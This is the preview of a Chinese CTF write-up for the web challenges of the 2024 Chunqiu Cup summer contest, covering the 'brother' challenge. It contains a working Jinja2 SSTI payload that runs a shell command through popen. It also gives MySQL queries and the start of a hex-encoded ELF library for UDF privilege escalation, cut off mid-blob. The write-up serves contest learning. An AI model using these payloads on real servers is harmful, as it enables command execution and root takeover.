2024春秋杯网络安全联赛夏季赛WP(web)

文章预览

1.    前言 个人赛，参赛的主要都是学生，不是特别卷。因为web比较有意思，AWDP也有三道是web。虽然有的题没解出来，但除了MyCMS没时间碰，其他基本都摸的差不多了。 2.    brother 本来是最难的一道题，但因为出题者没有正确的限制mysql的文件读写权限导致被偷鸡。 一眼SSTI /?name={{''.__class__.__base__.__subclasses__()[133].__init__.__globals__['popen']('ps aux').read()}} 本来是很难的多层权限提权题目，但看到mysql是root权限启动后就觉得可以偷。 api.py里有mysql账户密码，而且ctf是root权限，且secure_file_priv为空。一眼udf提权，直接掏出珍藏多年的linux udf脚本搞定。 show global variables like '%secure_file_priv%'; show variables like '%plugin%'; select * from func; select unhex('7F454C4602010100000000000000000003003E0001000000800A000000000000400000000000000058180000000000000000000040003800060040001C0019000100000005000000000000000000000 ………………………………